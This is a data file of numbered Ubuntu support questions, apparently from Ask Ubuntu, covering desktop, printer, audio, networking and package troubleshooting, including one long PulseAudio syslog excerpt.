20298	how to make xinput settings persist after devices are unplugged , replugged , and after shutdown , restart , etc ?	i successfully followed the answer to this question to set different sensitivities for my touchpad and my usb mouse . only problem is , once you unplug and replug the device or shutdown , restart etc. , the settings reset .
20299	can i control where default focus is for an application ?	when i start some app i want to control were focus is ( for example if i start firefox i want focus to be for example on address bar ) . p.s . im not looking for firefox plugin , i just wonder if there is app for that .
20300	is there an equivalent to totalcmd ?	is there any alternative to total commander for linux ?
20301	disable wired when wireless is up	my laptop has wired and wireless connection capabilities . i want to disable my wired connection when my wireless is up and running ? how can i proceed ? i used nmcli tool to establish my connection . nmcli con up id nmcli con up id currently i have wired and wireless up and running i also try to use nmcli con down id but unsucess thanks
20303	how do i get hdmi audio working on a zotac mag hd-nd01-u ?	i bought a zotac mag and would like all the audio to output from the hdmi cable .
20305	are there any apps to run kodak esp 3250 ?	all i can find is for windows and mac
20306	i have n't received my verification code from ubuntu one & tried 3 e-mail addresses !	the subject asks it all really ! i have full connection . i have synced 2 aol accounts and a zoho account via evolution mail . i have switched off all filters in all accounts so everything gets filtered through my desktop . i have checked the accounts directly to see if anything is amiss . i 'm at a loss ! ... help ?
20311	can not install nautilus elementary	when i try apt-cache policy nautilus it shows this , installed : 1:2.32.0-0ubuntu1-ppa1 candidate : 1:2.32.0-0ubuntu1-ppa1 version table : *** 1:2.32.0-0ubuntu1-ppa1 0 100 /var/lib/dpkg/status 1:2.32.0-0ubuntu6~ppa160 0 500 http : //ppa.launchpad.net/am-monkeyd/nautilus-elementary-ppa/ubuntu/ maverick/main amd64 packages 1:2.32.0-0ubuntu1.1 0 500 http : //archive.ubuntu.com/ubuntu/ maverick-updates/main amd64 packages 1:2.32.0-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ maverick/main amd64 pack as you can see i allready add the am-monkeyd ppa but when i 'm update & upgrade nothing change .
20313	name resolution on home lan ?	is there an easy way to allow my other computers to resolve my hostname over the network without having them edit their hosts files or their dns settings ? some of the computers are on windows .
20314	where are panel launchers located ?	i am moving from ubuntu 8.04 to 10.4 ( yeah ... : ) ) and i would like to copy quite a few useful launchers i created over the years . where are they located in 8.04 ?
20315	looking for bind web interface	i currently manage the domains of many clients and would like to setup a bind server so i can all manage them from one place . now , i 'm looking for a web interface to bind that would let my clients manage their domains by themselves in case they wanted to . what web apps would be well suited for this ? i 'm looking for something that will only do dns management , not something more complete like webmin .
20317	gtk spinbuttion in a toolbar	how do i place a spinbutton widget on a toolbar using gtk , or gtkmm ?
20318	`` adding printer '' dialog asks for root password ?	i try to setup my printer under ubuntu . so far it worked that i succeed to install the drivers . but ubuntu says : no driver available for this model . this is the problem that ubuntu does n't recognize the right model , so i have to add and the choose the right driver manually . no problem i thought . but when i try to add a printer , i 'm prompted to provide a root password althought i did n't setup one ? so i'mnot able to confirm the dialog and add my printer , what 's the reason ?
20319	videos have blue faces when i play them	i started the video and it says it has no codex and it can search for it ( it looked cool ) and it has downloaded them and video works great , but for some reason all the faces on videos i 'm watching are blue , how to make them not blue ? ( i bet its a common problem ) . p.s . i 'm not prejudiced against aliens , i just do n't like them .
20320	ubuntu netbook - i ca n't see panels	i installed the netbook version on my notebook and now i ca n't see taskbar or panel . if i switch to the desktop version everything is normal .
20322	how do i add artists to the ubuntu one store ?	several of my friends are in bands and looking at different means to distribute their music . what 's the procedure for getting an artist added to the ubuntu one music store ? costs , exclusiveness , contracts , profit sharing , etc ? is there a minimum price for a song or is that up to the artist/label ?
20323	can you delete the humanity icon theme safely ?	i 'm trying to reduce used space after running disk usage analyser , since i 'm using a 40gb ssd . the icons use quite a bit of space ! could i delete those that i do n't use , such as humanity ? ( i use faenza-dark ) if it is possible , what would be the best way to this ? as when i attempt to remove humanity in the software centre it says the software-centre itself must be removed . similar problems arise with synaptic package manager . i was wary of just deleting the unused directories in usr/share/icons/ . thanks for the help !
20326	why do n't 8.04 panel launchers work on 10.04	i copied my panel launchers verbatim from 8.04 to 10.04 , residing in both systems in the same path : $ home/.gnome2/panel2.d/default/launchers however , for some reason , they are not visible on 10.04 's gnome panel . why ? update 1 : in my attempts to troubleshoot the problem i : verified that copied 8.04 launchers have same permissions as manually created 10.04 launchers ( -rwxr-xr-x ) . added the first line as : # ! /usr/bin/env xdg-open logged off , then logged on . rebooted . update 2 : i manually created a new launcher which would duplicate the functionality of a copied one . this one of course shows up and so i went ahead and compared the two , step-by-step bringing them to being identical ! ( copied icon paths , then removed the 'encoding=utf-8 ' line , etc. ) . none of the above helped . so the question remains : why ? is there some type of `` registry '' out there ?
20330	how to run a script without closing the terminal ?	i have a script in file bla.sh and it is executable . when i click on it , the script is executed and the window is closed . i 'd like the window to stay open . something like command cmd /k** command in windows . p.s . i do n't want to use pause , but i want to able to write more commands after the script was executed .
20343	what does this icon mean in the ubuntuone sign up screen ?	i 'm trying to create a new ubuntuone account , and getting this : the email addresses are the same in both fields , and the password meets the criteria set . what exactly do the triangle icons mean ? there 's no alt text when i mouse over them , so i have no idea what it thinks is wrong with the new account setup information i 'm providing .
20350	do i have to unmount not-linux partitions ?	i remember that in old linux before closing system i had to manually unmount other partitions ( ntfs/fat32 ) . do i have to do that in ubuntu or is it magically umounted before shutdown by the system ?
20355	running 32-bit app under 64-bit linux	by mistake i have installed 64-bit linux ( hey ! it happens to every1 ! ) . how can i run 32-bit app under that linux ?
20356	printer canon mp540 succesfully added finally but does n't print ? ( attached debug log )	i tried to setup my printer in ubuntu 10.10 . i had to use special guide to install because canon used libcupsys2 in its packages and ubuntu expects libscupsys i followed this guide in reference to this advice . the first problem was this one ( the ubuntu `` add printer dialog asked for root credentials '' . the suggested workarout in launchpad to create a root password worked . now i added the printer . it 's available for printing . then i got an error message `` cups insecure filter '' which prevented me from printing . that could be solved by setting the need root rights in the /usr/lib/cups/filter/ directory . the error message disappeared after restarting cups service . now it should work but it does n't . the main problem is now , the printer seems to be proper setup but when i try to print a document , the printer icon appears for short time in gnomepanel . there 's a printing job in queue which got completed , but the printer does n't print . i attached the debuglog provided by printer error control , had to upload to another site , since it was to big in the question body here . perhaps someone can identify the problem with it ? note : i know that it once worked fine with an older release of ubuntu , but not sure which version this was .
20370	how to change video codec that is being use for videos ?	i need to change video codec , because of this i 'm new to ubuntu . how to do it ?
20372	vmware workstation 6.5.5 install freezes	i am trying to install vmware workstation 6.5.5 ( 64-bit ) on ubuntu 10.04 ( 64-bit ) , but at about 2/3 of the progress bar , it freezes where it says : installing vmware player 2.5.5 configuring ... interestingly , it is so frozen , that even after i hit cancel , it is still stuck . cpu consumption is at 0 % and the command with which i launched the installer is : sudo sh vmware-workstation-6.5.5-328052.x86_64.bundle anyone has seen this before ? any idea why this is happening and how to solve this ?
20377	what exact purpose have transitional packages ?	what are transitional packages and what exact purpose do they have ?
20379	system time off by a small amount	on karmic ( 9.10 ) , my system time is currently off by 17 minutes , e.g . when i type date on the terminal i get thu jan 6 16:22:29 cst 2011 while the correct time is 16:05pm . i went through the standard time set and can not fix this . if it were off by a multiple of an hour i would blame timezone or daylight savings time settings , but 17 minutes , i have no idea . thanks
20380	how to make xlock use the first key i hit as a part of my password	i just switched from arch linux to ubuntu 10.10 . i 'm running the fluxbox window manager , and i use xlockmore to lock my screen with the following key shortcut : 192 : exec xlock-mode marquee +usefirst -icongeometry 240x240 -message `` back in a minute ... '' the problem i 'm having is that xlock is definitely not using my first key as part of my password . instead , it uses some randomized fade pattern to fade to the password screen . i find this highly annoying , as when i get back to my desk and start entering my password it does n't register password characters until the fade pattern is complete . i 've also tried the following modifications with no difference : 192 : exec xlock -mode marquee -usefirst -icongeometry 240x240 -message `` back in a minute ... '' 192 : exec xlock -mode marquee -icongeometry 240x240 -message `` back in a minute ... '' the first example worked flawlessly on arch . does ubuntu have some sort of system default that you ca n't override on the command-line ?
20384	how to change the position of the volume up/down/mute notification popup ?	well i really do n't know how is it called but i 'd like to know if i can change the position where it shows ( top right corner ) , since i no longer have gnome panels anywhere i don`t like that popup being there .
20385	change of default applications during upgrade	libreoffice and banshee are set to replace openoffice and rhythmbox as we move from 10.10 to 11.04 . doing a fresh install obviously makes these new applications the default ones . however , if i choose to upgrade via the update manager , will the old applications be uninstalled and the new ones installed automatically as replacement , or do i have to do these manually so that i get the same experience as a fresh install ?
20390	should i enable root account for rsync ?	how can i enable the root account ? i know it is not usually recommended but i 'd like to setup a non-interactive script to backup my server using rsync . i could use -- rsync-path= '' sudo rsync '' but then i would need to store my sudo password in clear which seems much worse than enabling the root account .
20393	how do i interpret hdd s.m.a.r.t results ?	my laptop has recently started to become a bit unreliable , and for some reason i started to suspect that my hdd was starting to fail . after a bit of hunting on the internet , i found ubuntu 's disk utility in the system menu and ran the long smart diagnostics from this . however , since the documentation for disk utility is very poor ( palimpsest ? ) , i 'm not sure how to interpret the results : for example , the read error rate is over 50 million ( ! ) , yet the assessment is rated `` good '' . so would someone mind explaining to me how to interpret the results of these tests ( especially the normalized , worst , threshold and value numbers ) ? and maybe tell me what they think of the results i got for my hdd ? ( thanks )
20397	how to sync an already converted video to ipod touch 4.1	how to synchronize an already converted video for the ipod touch to an ipod touch that has n't been jailbroken ? i have an unjailbroken ipod and i want to put videos to it . i have no problem adding music files to it . the version is 4.1 and ubuntu is 10.04.1 also , i want to know how to add games to it without using wifi but using ubuntu .
20399	position at center workspace when login ?	i have setup 3x3 workspace switcher , and i want to position in the center one by default . is it possible ?
20402	is there a public list anywhere of people who have signed the canonical contributor agreement ?	i know there are lists of ubuntu members and rankings of people contributing to the 5-a-day project , but i was wondering if there is a record of signatories of the canonical contributor agreement .
20403	can i install new emoticons on ubuntu as in kubuntu ?	is it possible ? or it 's just a kde specific feature ?
20405	the window of calender is out of the screen	i 've been using a external 21.5 ' monitor for my laptop of 12.1 ' monitor , and moved my top panel to the right and add a new panel to the bottom edge of the screen . a screenshot of the right part of my desktop : as you see , the window of the calender is out of the screen . the alt+left mouse button did not work . how do you move the calender window ? update : i managed to come up with a solution to get the window or panel of cal in the screen . just remove the panel of clock and re-add it . but unfortunately , the preferences are lost . you have to reset the preferences , such as locations ... but after re-adding 2 locations , the window of cal panel was just shown as the same of the previous screenshot before .
20406	clock in apache does n't match system time	my server time seems to be off on my apache2 install , how do i fix this ? just running purely `` date '' in terminal returns the right time but im not sure how to login to apache2 and change it ? this is on my local desktop lamp stack btw ...
20414	find and replace text within a file using commands	how can i find and replace specific words in a text file using command line ?
20419	opening skype , opera , openoffice logs me off	whats common among skype , opera , openoffice in ubuntu ? whenever i open these applications i get logged off and shows back me the login screen . this started happening since the 10.10 upgrade . forgot to mention : yes , its x64.each time i open these applications , the ui shows and then crashes . i started each app & logged the last few lines of /var/log/syslog after each crash . looks like something to do with sound drivers ? opera : jan 8 09:33:20 al-ubuntu pulseaudio [ 11532 ] : pid.c : daemon already running . jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : snd_pcm_avail_delay ( ) returned strange values : delay 0 is less than avail 8 . jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : most likely this is a bug in the alsa driver 'snd_hda_intel ' . please report this issue to the alsa developers . jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : snd_pcm_dump ( ) : jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : soft volume pcm jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : control : pcm playback volume jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : min_db : -51 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : max_db : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : resolution : 256 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : its setup is : jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : stream : capture jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : access : mmap_interleaved jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : format : s16_le jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : subformat : std jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : channels : 2 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : rate : 44100 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : msbits : 16 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : buffer_size : 88192 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_size : 44096 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_time : 999909 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : tstamp_mode : enable jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_step : 1 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : avail_min : 87310 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_event : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : start_threshold : -1 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : silence_threshold : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : silence_size : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : slave : hardware pcm card 0 'hda intel ' device 0 subdevice 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : its setup is : jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : stream : capture jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : access : mmap_interleaved jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : format : s16_le jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : subformat : std jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : channels : 2 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : rate : 44100 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : msbits : 16 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : buffer_size : 88192 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_size : 44096 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_time : 999909 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : tstamp_mode : enable jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_step : 1 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : avail_min : 87310 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : period_event : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : start_threshold : -1 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : silence_threshold : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : silence_size : 0 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : appl_ptr : 87320 jan 8 09:33:21 al-ubuntu pulseaudio [ 11429 ] : alsa-util.c : hw_ptr : 87320 jan 8 09:33:22 al-ubuntu kernel : [ 4962.078306 ] opera [ 11036 ] : segfault at 261 ip 0000000000000261 sp 00007fffed7cd9a8 error 14 in opera [ 400000+122b000 ] anjanesh @ al-ubuntu : ~ $ skypejan 8 09:40:21 al-ubuntu pulseaudio [ 12602 ] : pid.c : daemon already running . jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : snd_pcm_avail_delay ( ) returned strange values : delay 0 is less than avail 8 . jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : most likely this is a bug in the alsa driver 'snd_hda_intel ' . please report this issue to the alsa developers . jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : snd_pcm_dump ( ) : jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : soft volume pcm jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : control : pcm playback volume jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : min_db : -51 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : max_db : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : resolution : 256 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : its setup is : jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : stream : capture jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : access : mmap_interleaved jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : format : s16_le jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : subformat : std jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : channels : 2 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : rate : 44100 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : msbits : 16 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : buffer_size : 88192 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_size : 44096 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_time : 999909 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : tstamp_mode : enable jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_step : 1 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : avail_min : 87310 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_event : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : start_threshold : -1 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : silence_threshold : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : silence_size : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : slave : hardware pcm card 0 'hda intel ' device 0 subdevice 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : its setup is : jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : stream : capture jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : access : mmap_interleaved jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : format : s16_le jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : subformat : std jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : channels : 2 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : rate : 44100 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : msbits : 16 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : buffer_size : 88192 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_size : 44096 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_time : 999909 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : tstamp_mode : enable jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_step : 1 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : avail_min : 87310 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : period_event : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : start_threshold : -1 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : silence_threshold : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : silence_size : 0 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : appl_ptr : 87312 jan 8 09:40:23 al-ubuntu pulseaudio [ 12485 ] : alsa-util.c : hw_ptr : 87312 anjanesh @ al-ubuntu : ~ $ open officejan 8 09:43:46 al-ubuntu pulseaudio [ 13157 ] : pid.c : daemon already running . jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : snd_pcm_avail_delay ( ) returned strange values : delay 0 is less than avail 16 . jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : most likely this is a bug in the alsa driver 'snd_hda_intel ' . please report this issue to the alsa developers . jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : snd_pcm_dump ( ) : jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : soft volume pcm jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : control : pcm playback volume jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : min_db : -51 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : max_db : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : resolution : 256 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : its setup is : jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : stream : capture jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : access : mmap_interleaved jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : format : s16_le jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : subformat : std jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : channels : 2 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : rate : 44100 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : msbits : 16 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : buffer_size : 88192 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_size : 44096 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_time : 999909 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : tstamp_mode : enable jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_step : 1 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : avail_min : 87310 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_event : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : start_threshold : -1 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : silence_threshold : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : silence_size : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : slave : hardware pcm card 0 'hda intel ' device 0 subdevice 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : its setup is : jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : stream : capture jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : access : mmap_interleaved jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : format : s16_le jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : subformat : std jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : channels : 2 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : rate : 44100 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : exact rate : 44100 ( 44100/1 ) jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : msbits : 16 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : buffer_size : 88192 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_size : 44096 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_time : 999909 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : tstamp_mode : enable jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_step : 1 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : avail_min : 87310 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : period_event : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : start_threshold : -1 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : stop_threshold : 6205960286516543488 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : silence_threshold : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : silence_size : 0 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : boundary : 6205960286516543488 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : appl_ptr : 87320 jan 8 09:43:48 al-ubuntu pulseaudio [ 13064 ] : alsa-util.c : hw_ptr : 87320 anjanesh @ al-ubuntu : ~ $
20422	how to get usc-package-info through php or javascript ?	is there a way where i can get information about a package which is in ubuntu software center , such as package-title package-size package-logos etc . through php or javascript ?
20423	virtualbox host : ubuntu vs. windows xp	in order to lengthen the lifespan of my machine i am replacing the weakest link , the hard drive and installing a new os . i had planned on using xp pro as my virtualbox host and ubuntu as guest . after messing with ubuntu desktop and server i am really impressed and am thinking of reversing the virtualbox setup ; ubuntu host xp guest . i would use xp for adobe fireworks , netflix , and itunes ( maybe ) that 's pretty much it . any reason not to do ubuntu host with xp guest ? i know the xp vbox will run slower as a guest but really how much slower ? it 's a desktop . 4gb ram , 500gb disk , pent d 3.2 ghz
20424	installed sun java 6 - configuration problem when running as sudo	i have install sun java 6 on an ubuntu server and set an environment variable in the default profile as per the instructions at http : //www.edugate.ie/workshop-guides/shibboleth-2-identity-provider-installation-linux-debian-or-ubuntu i then try to run an installer for a java servlet - but when i run it as myself , it can not create the required directory in /opt . when i run it as sudo , i am told that java_home is not correct and it does n't even start the installer - should n't this be coming from /etc/profile like it is for my normal user ?
20431	teamviewer in notification area only	i was wondering if there was a simple way to close teamviewer to the notification area like i would close skype ? edit : just to clarify my initial post , i want to enable teamviewer in the notification area so that i can close it in my open programs bar ( click on x ) , and it would still be running in the notification area ( skype does that , i can option banshee and rhythmbox to do that , and transmission does this too ) . all tray puts it into the notification area , but the x still closes teamviewer completely , and i have not found an optional setting in teamviewer either . thanks for the answer though karni ! ; )
20432	has anyone got `` creative soundblaster x-fi surround 5.1 pro '' - ( usb interface ) installed ?	has anyone tried this external usb sound blaster on ubuntu . http : //us.store.creative.com/sound-blaster-xfi-surround-5.1-pro/m/b0044dedca.htm . i have bought m-audio bx5a deluxe studio monitors for my t61 . i think the onboard intel hd sound card will not do any justice to these speakers . so i am looking for an external sound interface . i particularly liked this one as it is not very expensive and it has a volume control ( speaker lack a central-front volume knob ) . has anyone been able to use this on ubuntu . also , if anyone would like to recommend me another option ?
20442	how can a user get write access to `` /sys '' ?	i 'd like to know what i need to do to enable a user to modify values in /sys . as it 's a sysfs , changing file permissions is not an option ( and i do n't like to do it on every boot ) .
